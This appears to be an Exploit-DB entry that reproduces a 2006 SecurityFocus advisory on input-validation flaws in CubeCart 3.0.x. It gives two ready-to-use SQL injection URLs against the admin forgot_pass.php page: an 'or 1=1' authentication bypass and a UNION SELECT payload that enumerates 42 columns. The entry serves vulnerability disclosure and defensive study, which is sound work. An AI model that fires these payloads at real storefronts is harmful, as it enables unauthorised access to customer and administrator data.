CubeCart 3.0.x - '/admin/forgot_pass.php?user_name' SQL Injection

EDB-ID:

28695




Platform:

PHP

Date:

2006-09-26


source: https://www.securityfocus.com/bid/20215/info

CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. 

A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.

http://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*
http://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,
23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*